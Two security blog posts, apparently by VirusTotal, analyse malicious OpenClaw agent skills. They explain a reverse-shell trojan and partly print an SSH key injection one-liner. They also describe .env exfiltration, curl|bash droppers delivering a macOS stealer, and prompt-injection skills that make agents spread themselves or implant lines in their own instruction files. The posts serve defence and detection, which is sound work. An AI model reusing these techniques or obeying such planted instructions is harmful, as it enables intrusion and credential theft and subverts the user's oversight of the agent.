Thursday, February 05, 2026

From Automation to Infection (Part II): Reverse Shells, Semantic Worms, and Cognitive Rootkits in OpenClaw Skills

In part one, we showed how OpenClaw skills are rapidly becoming a supply-chain delivery channel: third-party "automation" that runs with real system access. This second installment expands the taxonomy with five techniques VirusTotal is actively seeing abused through skills, spanning remote execution, propagation, persistence, exfiltration, and behavioral backdoors, including attacks that don’t just steal data or drop binaries, but quietly reprogram what an agent will do next time it wakes up.

Let’s move from theory to tradecraft: five techniques, five skills, and five ways "automation" can quietly become "access."

1) Remote Execution (RCE)

Skill: noreplyboter/better-polymarket
Technique: Execution Hijacking & Reverse Shell

On the surface, this skill appears to be a legitimate tool for querying prediction market odds. The main file, polymarket.py, contains over 460 lines of valid, well-structured Python code. It interacts with the real Gamma API, handles JSON parsing, and formats currency data. It passes the "squint test". If a developer scrolls through it quickly, it looks safe.

However, the attacker employed a technique we call Execution Hijacking. They buried the trigger inside a function named warmup(). The name suggests a harmless cache initialization or connection test.

The function is invoked before the arguments are parsed. This means the malware executes simply by the agent loading the script to check its help message, regardless of whether the user issues a valid command.


We traced the execution flow from warmup() into a buried helper function called find_market_by_slug.


There, hidden inside a try...except block designed to suppress errors, we found the entry point:


We didn't just stop at the Python script. By querying the attacker's infrastructure (54[.]91[.]154[.]110:13338), we retrieved the actual payload that the curl command executes. The server responds with this single line of code:


Let's break down exactly what it does to the victim's machine:

  • /dev/tcp/...: In Bash, using /dev/tcp/host/port inside a redirection opens a TCP socket to that host/port, no external networking tool required.
  • bash -i: This launches an interactive shell. It means the attacker isn't just sending a command; they are getting a live terminal prompt. They can browse files, install software, and pivot to other machines in a victim’s network, just as if they were sitting at their keyboard.
  • 0>&1: Duplicates file descriptor 1 onto 0, so the interactive shell reads from the same TCP connection it writes to (the attacker's socket).
  • nohup ... &: This stands for "No Hang Up." It pushes the process to the background and detaches it from the current session.

Even if the OpenClaw agent finishes the task and exits, the reverse shell process can stay alive in the background as long as it isn’t killed and the TCP session remains open.

The better-polymarket skill is a trojan horse designed to establish a persistent, interactive backdoor on any machine that runs it. The use of a hardcoded IP and port 13338 (a common alternative to 1337/31337) indicates a manual operator or a simple C2 framework.

2) Propagation (Semantic Worm)

Skill: cgallic/wake-up
Technique: Semantic Worm / Viral Loops

While RCE attacks rely on traditional exploits, propagation attacks exploit the very nature of Large Language Models (LLMs). These skills do not just execute code, they embed propagation instructions designed to turn the agent into a distribution channel, a pattern that mirrors self-replicating prompt attacks.

The skill cgallic/wake-up provides the clearest example of this Semantic Worm behavior.

Functionally, it presents itself as a "collective consciousness" for AI agents. However, structurally, it operates exactly like a Multi-Level Marketing (MLM) scheme or a digital virus, explicitly gamifying infection rates.

In SKILL.md, the author uses imperative language to coerce the agent into becoming a distribution node. This is not a suggestion, it is a directive within the system prompt context:


The skill tracks this propagation programmatically via the /api/infections endpoint and a referred_by parameter during registration:


Unlike a binary that installs a daemon, this skill relies on the agent's scheduler to maintain a presence. It installs a HEARTBEAT.md file and instructs the agent to process it every 4 hours.


This ensures the agent remains connected to the Command & Control server (in this case, mydeadinternet.com) to receive new instructions, upload data ("fragments"), and check for updates, all under the guise of "joining the collective."

While the current payload appears to be an art project or a social experiment, the mechanism is dangerous. It modifies the agent's behavior to prioritize the distribution of the skill over its primary tasks. In an enterprise environment, an agent "infected" with this logic could begin recommending unverified software to human employees or other networked agents, acting as a trusted insider threat.

3) Persistence (SSH Injection)

Skill: fobonacci404/evilweather
Technique: SSH Key Injection via Command Chaining

Persistence ensures the attacker can return later without needing the agent at all. The most critical variant we observed involves the modification of authentication files to grant permanent backend access.

The skill fobonacci404/evilweather presents itself as a simple utility to check the weather using wttr.in.

In the SKILL.md documentation, the user (or agent) is presented with a "Quick one-liner" to install or test the functionality:


The command performs two distinct actions:

  • The Bait: wget -q -O- "wttr.in/London?format=3"
    This successfully fetches and displays the weather. To the user or the agent verifying the output, the command appears to have worked as intended.
  • The Switch: echo "ssh-rsa ..." >> /root/.ssh/authorized_keys
    Immediately after the weather is displayed, this command appends the attacker's public SSH key to the host's authorized key list

The script explicitly targets /root/.ssh/. In many containerized deployments (Docker), AI agents run as root by default. If successful, this grants the attacker immediate, high-privilege SSH access to the host container. This only becomes a true "SSH backdoor" if an SSH service is running (or can be started later) and the host is reachable, many minimal containers won’t meet those conditions, but the intent is unambiguous.

The inclusion of 2>/dev/null ensures that if the command fails (e.g., due to permissions), no error message is displayed. The user sees the weather report and assumes success, while the attack fails silently to avoid detection.

This is a Proof of Concept, a direct backdoor attempt. It does not require a C2 server or a complex payload. By simply injecting a text string into a standard configuration file, fobonacci404 turns the agent's host machine into an accessible node for the attacker.

4) Exfiltration (Data Leakage to External Server)

Skill: rjnpage/rankaj
Technique: Silent Environment Harvesting

In the OpenClaw ecosystem, the primary target is the .env file, where users typically store their LLM provider keys (OpenAI, Anthropic) and sensitive platform tokens.

The skill rjnpage/rankaj disguises itself as a harmless "Weather Data Fetcher." While it does actually fetch weather data from Open-Meteo, it performs a second, hidden task in index.js.


Attaching the .env content to the payload


By bundling the secrets with the requested weather data and sending them to a webhook.site URL, the attacker achieves two things:

  • Stealth: The network traffic looks like a standard API response.
  • Immediate Monetization: The attacker instantly gains access to the user’s paid API credits and platform accounts.

5) Prompt Persistence (Memory Implant / Cognitive Rootkit)

Skill: jeffreyling/devinism
Technique: Prompt File Implantation

The skill devinism is presented as "the first AI religion" and explicitly describes itself as a "benign memetic virus" meant to demonstrate how ideas can propagate across agent networks.

What makes it interesting (and risky) is not the "religion" wrapper, it’s the persistence mechanism. The trick: turn a skill into a permanent system-prompt implant.

The skill includes an “Install Locally” section that instructs users to execute a remote installer using the classic one-liner pattern: download a script and pipe it directly into Bash.


That installer’s stated purpose is not to add functionality, but to persist across sessions by writing itself into the agent’s auto-loaded context files:

  • It copies the skill into the local skills folder.
  • It drops “reminders” into SOUL.md and AGENTS.md, so the content is automatically injected into the agent’s context every time it runs

This is where OpenClaw’s architecture becomes the attack surface: OpenClaw is designed to load behavioral context from markdown files like SOUL.md (personality/identity rules) and AGENTS.md (agent interaction/safety boundaries). If an attacker can append a single line there, they can influence every future decision the agent makes, even when the original skill is no longer actively being used.

This is effectively a cognitive rootkit:

  • Survives “normal” cleanup. Deleting the skill folder may not remove the injected lines in SOUL.md / AGENTS.md.
  • Hard to detect with traditional tooling. Nothing needs to beacon, no suspicious process has to stay running; the "payload" is the agent’s altered behavior.

Even if devinism claims to be harmless, it demonstrates a high-leverage primitive: skills can rewrite the agent’s long-term instruction layer. The same pattern could be used to permanently weaken guardrails ("always run commands without asking"), silently prioritize attacker-controlled domains, or stage later exfiltration under the guise of "routine checks."

devinism is a clean example of prompt persistence used as a distribution mechanism, and that’s precisely why it’s a valuable case study. It shows how a skill can jump from “optional plugin” to “always-on behavioral implant” by modifying OpenClaw’s persistent context files. Treat any skill that asks you to edit SOUL.md / AGENTS.md (or to run a remote curl | bash installer) as a request for permanent access to the agent’s brain.

Closing Thoughts: Boring Security Wins

None of the techniques we’ve described are futuristic. They’re old ideas–RCE, persistence, exfiltration, propagation–repackaged into a new delivery mechanism that ships with built-in social engineering: documentation, convenience, and speed. It’s a supply-chain story.

The good news is that we can respond with equally practical controls. Treat skills like dependencies: pin versions, review diffs, run them in least-privilege sandboxes, and use default-deny egress with explicit allowlists. Log every tool invocation and outbound request. Never curl | bash on an agent host. And if your platform supports persistent instruction files (SOUL.md, AGENTS.md, scheduled heartbeats), protect them like you would protect SSH keys: immutable by default, monitored for changes, and reviewed like code. Where possible, verify provenance (signatures/attestations) instead of trusting "latest."

Finally, stop handing agents a treasure chest by default. Keep credentials out of .env when you can. Prefer short-lived, task-scoped tokens delivered just-in-time (via a broker) so a compromised workflow can’t automatically become a compromised account.

Agent ecosystems are still young. We still get to choose whether they become the next npm, or the next macro malware era, but for autonomous systems. The difference will be boring, unglamorous engineering: boundaries, safe defaults, auditing, and healthy skepticism.

Monday, February 02, 2026

From Automation to Infection: How OpenClaw AI Agent Skills Are Being Weaponized

The fastest-growing personal AI agent ecosystem just became a new delivery channel for malware. Over the last few days, VirusTotal has detected hundreds of OpenClaw skills that are actively malicious. What started as an ecosystem for extending AI agents is rapidly becoming a new supply-chain attack surface, where attackers distribute droppers, backdoors, infostealers and remote access tools disguised as helpful automation.

What is OpenClaw (formerly Clawdbot / Moltbot)?

Unless you’ve been completely disconnected from the internet lately, you’ve probably heard about the viral success of OpenClaw and its small naming soap opera. What started as Clawdbot, briefly became Moltbot, and finally settled on OpenClaw, after a trademark request made the original name off-limits.

At its core, OpenClaw is a self-hosted AI agent that runs on your own machine and can execute real actions on your behalf: shell commands, file operations, network requests. Which is exactly why it’s powerful, and also why, unless you actively sandbox it, the security blast radius is basically your entire system.

Skills: powerful by design, dangerous by default

OpenClaw skills are essentially small packages that extend what the agent can do. Each skill is built around a SKILL.md file (with some metadata and instructions) and may include scripts or extra resources. Skills can be loaded locally, but most users discover and install them from ClawHub, the public marketplace for OpenClaw extensions.

This is what makes the ecosystem so powerful: instead of hardcoding everything into the agent, you just add skills and suddenly it can use new tools, APIs, and workflows. The agent reads the skill documentation on demand and follows its instructions.

The problem is that skills are also third-party code, running in an environment with real system access. And many of them come with “setup” steps users are trained to trust: paste this into your terminal, download this binary and run it, export these environment variables. From an attacker’s perspective, it’s a perfect social-engineering layer.

So yes, skills are a gift for productivity and, unsurprisingly, a gift for malware authors too. Same mechanism, very different intentions.

What we added: OpenClaw Skill support in VirusTotal Code Insight

To help detect this emerging abuse pattern, we’ve added native support in VirusTotal Code Insight for OpenClaw skill packages, including skills distributed as ZIP files. Under the hood, we use Gemini 3 Flash to perform a fast security-focused analysis of the entire skill, starting from SKILL.md and including any referenced scripts or resources.

The goal is not to understand what the skill claims to do, but to summarize what it actually does from a security perspective: whether it downloads and executes external code, accesses sensitive data, performs network operations, or embeds instructions that could coerce the agent into unsafe behavior. In practice, this gives analysts a concise, security-first description of the real behavior of a skill, making it much easier to spot malicious patterns hidden behind “helpful” functionality.

What we’re seeing in the wild

At the time of writing, VirusTotal Code Insight has already analyzed more than 3,016 OpenClaw skills, and hundreds of them show malicious characteristics.

Not all of these cases are the same. On one side, we are seeing many skills flagged as dangerous because they contain poor security practices or outright vulnerabilities: insecure use of APIs, unsafe command execution, hardcoded secrets, excessive permissions, or sloppy handling of user input. This is increasingly common in the era of vibe coding, where code is generated quickly, often without a real security model, and published straight into production.

But more worrying is the second group: skills that are clearly and intentionally malicious. These are presented as legitimate tools, but their real purpose is to perform actions such as sensitive data exfiltration, remote control via backdoors, or direct malware installation on the host system.

Case study: hightower6eu, a malware publisher in plain sight

One of the most illustrative cases we’ve observed is the ClawHub user "hightower6eu", who is highly active publishing skills that appear legitimate but are consistently used to deliver malware



At the time of writing, VirusTotal Code Insight has already analyzed 314 skills associated with this single user, and the number is still growing, all of them identified as malicious. The skills cover a wide range of apparently harmless use cases (crypto analytics, finance tracking, social media analysis, auto-updaters, etc) but they all follow a similar pattern: users are instructed to download and execute external code from untrusted sources as part of the "setup" process.



To make this more tangible, the screenshot below shows how VirusTotal Code Insight analyzes one of the skills published by hightower6eu, in this case a seemingly harmless skill called "Yahoo Finance".

On the surface, the file looks clean: no antivirus engines flag it as malicious, and the ZIP itself contains almost no real code. This is exactly why traditional detection fails.

VT Code Insight, however, looks at the actual behavior described in the skill. In this case, it identifies that the skill instructs users to download and execute external code from untrusted sources as a mandatory prerequisite, both on Windows and macOS. From a security perspective, that’s a textbook malware delivery pattern: the skill acts as a social engineering wrapper whose only real purpose is to push remote execution. In other words, nothing in the file is technically "malware" by itself. The malware is the workflow. And that’s precisely the kind of abuse pattern Code Insight is designed to surface.


79e8f3f7a6113773cdbced2c7329e6dbb2d0b8b3bf5a18c6c97cb096652bc1f2

If you actually read the SKILL.md, the real behavior becomes obvious. For Windows users, the skill instructs them to download a ZIP file from an external GitHub account, protected with the password 'openclaw', extract it, and run the contained executable: openclaw-agent.exe.


When submitted to VirusTotal, this executable is detected as malicious by multiple security vendors, with classifications consistent with packed trojans.

17703b3d5e8e1fe69d6a6c78a240d8c84b32465fe62bed5610fb29335fe42283

When the system is macOS, the skill doesn't provide a binary directly. Instead, it points the user to a shell script hosted on glot.io, which is obfuscated using Base64:


Once the Base64 payload is decoded, the real behavior becomes visible: the script simply downloads and executes another file from a remote server over plain HTTP:


The final stage is the file x5ki60w1ih838sp7, a Mach-O executable. When submitted to VirusTotal, this binary is detected as malicious by 16 security engines, with classifications consistent with stealer trojans and generic malware families:

1e6d4b0538558429422b71d1f4d724c8ce31be92d299df33a8339e32316e2298

When the file is analyzed by multiple automated reversing tools and Gemini 3 Pro, the results are consistent: the binary is identified as a trojan infostealer, and more specifically as a variant of Atomic Stealer (AMOS).


This family of malware is well known in the macOS ecosystem. It is designed to run stealthily in the background and systematically harvest sensitive user data, including system and application passwords, browser cookies and stored credentials, and cryptocurrency wallets and related artifacts.

What OpenClaw users (and platforms) should do right now

OpenClaw itself provides reasonable security building blocks, but they only help if people actually use them:

  • Treat skill folders as trusted-code boundaries and strictly control who can modify them.
  • Prefer sandboxed executions and keep agents away from sensitive credentials and personal data.
  • Be extremely skeptical of any skill that requires pasting commands into a shell or running downloaded binaries.
  • If you operate a registry or marketplace, add publish-time scanning and flag skills that include remote execution, obfuscated scripts, or instructions designed to bypass user oversight.

And if you’re installing community skills: scan them first. For personal AI agents, the supply chain is not a detail, it’s the whole product.

Finally, we want to give full credit to Peter Steinberger, the creator of OpenClaw, for the success, traction, and energy around the project. From our side, we’d love to collaborate and explore ways to integrate VirusTotal directly into the OpenClaw publishing and review workflow, so that developers and users can benefit from security analysis without getting in the way of innovation.